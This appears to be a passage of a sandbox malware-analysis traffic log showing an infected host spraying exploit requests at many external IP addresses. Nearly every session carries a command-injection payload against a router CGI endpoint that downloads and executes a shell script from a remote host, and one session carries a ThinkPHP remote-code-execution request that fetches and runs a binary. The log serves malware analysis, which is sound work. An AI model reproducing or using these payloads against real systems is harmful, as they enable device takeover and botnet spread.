                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        578192.168.2.144820662.174.10.1358080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:12.485580921 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        579192.168.2.143782631.220.22.488080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:12.527930021 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        580192.168.2.144020494.130.125.908080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:12.598773003 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:12.810231924 CET409INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 08:34:12 GMT
                                                        Server: Apache
                                                        Content-Length: 196
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        581192.168.2.144110685.214.211.168080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:12.654639006 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:12.873661041 CET1286INHTTP/1.1 200 OK
                                                        Accept-Ranges: bytes
                                                        Content-Length: 2802
                                                        Content-Type: text/html; charset=utf-8
                                                        Last-Modified: Tue, 21 Feb 2023 21:06:15 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:12 GMT
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 6e 69 66 65 73 74 22 20 68 72 65 66 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 6f 6e 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 34 34 78 31 34 34 22 20 68 72 65 66 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 3e 3c 74 69 74 6c 65 3e 50 75 66 66 65 72 50 61 6e 65 6c 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 31 30 30 2c 33 30 30 2c 34 30 30 2c 35 30 30 2c 37 30 30 2c 39 30 30 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 4d 6f 6e 6f 3a 34 30 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 63 68 75 6e 6b 2d 61 65 62 30 37 63 38 30 2e 64 65 36 34 37 30 62 30 2e 63 73 73 22 20 72 65 6c 3d 22 70 72 65 66 65 74 63 68 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 63 68 75 6e 6b 2d 66 34 63 33 33 39 32 32 2e 37 65 62 64 30 32 33 37 2e 63 73 73 22 20 72 65 6c 3d 22 70 72 65 66 65 74 63 68 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6a 73 2f 63 68 75 6e 6b 2d 32 64 30 61 62 34 33 61 2e 65 38 35 62 33 30 37 31 2e 6a 73 22 20 72 65 6c 3d 22 70 72 65 66 65 74 63 68 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6a 73 2f 63 68 75 6e 6b 2d 32 64 30 61 63 32 33 39 2e 39 62 36 31 38 63 31 33 2e 6a 73 22 20 72 65 6c 3d 22 70 72 65 66 65 74 63 68 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6a 73 2f 63 68 75 6e 6b 2d 32 64 30 62 33 32 38 39 2e 38 34 39 38 61 35 33 36 2e 6a 73 22 20 72 65 6c 3d 22 70 72 65 66 65 74 63 68 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6a 73 2f 63 68 75 6e 6b 2d 32 64 30 62 36 35 36 36 2e 32 31 64 62 31 33 31 36 2e 6a 73 22 20 72 65 6c 3d 22 70 72 65 66 65 74 63 68 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6a 73 2f 63 68 75 6e 6b 2d 32 64 30 63 62 61 65 30 2e 61 65 39 38 38 61 31 39 2e 6a 73 22 20 72 65 6c 3d 22 70 72 65 66 65 74 63 68 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6a 73 2f 63 68 75 6e 6b 2d 32 64 30 65 36 38 62 33 2e 66 33 37 39 63 64 65 34 2e 6a 73 22 20 72 65 6c 3d 22 70 72 65 66 65 74 63 68 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6a 73 2f 63 68 75 6e 6b 2d 32 64 30 65 38 63 39 62 2e
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="icon" type="image/png" href="/favicon.png"><link rel="manifest" href="/manifest.json"><link rel="apple-touch-icon" sizes="144x144" href="apple-touch-icon.png"><title>PufferPanel</title><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700,900"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto+Mono:400"><link href="/css/chunk-aeb07c80.de6470b0.css" rel="prefetch"><link href="/css/chunk-f4c33922.7ebd0237.css" rel="prefetch"><link href="/js/chunk-2d0ab43a.e85b3071.js" rel="prefetch"><link href="/js/chunk-2d0ac239.9b618c13.js" rel="prefetch"><link href="/js/chunk-2d0b3289.8498a536.js" rel="prefetch"><link href="/js/chunk-2d0b6566.21db1316.js" rel="prefetch"><link href="/js/chunk-2d0cbae0.ae988a19.js" rel="prefetch"><link href="/js/chunk-2d0e68b3.f379cde4.js" rel="prefetch"><link href="/js/chunk-2d0e8c9b.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        582192.168.2.144413431.136.105.2148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:12.656960964 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:13.350284100 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:14.694205999 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:17.446103096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:22.821959972 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:33.573432922 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:55.588519096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:38.594841003 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        583192.168.2.145476094.121.179.2088080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:12.683295965 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        584192.168.2.144071094.123.42.2218080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:12.683518887 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        585192.168.2.145718894.123.143.1638080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:12.683609962 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        586192.168.2.146013294.122.72.378080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:12.683674097 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        587192.168.2.143318694.121.156.878080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:12.683873892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        588192.168.2.143663631.193.87.1698080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:12.686422110 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:12.938172102 CET313INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        589192.168.2.143778885.122.220.508080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:12.858731985 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        590192.168.2.143650495.179.224.4180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:13.171870947 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:13.363279104 CET404INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:13 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        591192.168.2.143429494.46.15.1308080
                                                        TimestampBytes transferredDirectionData
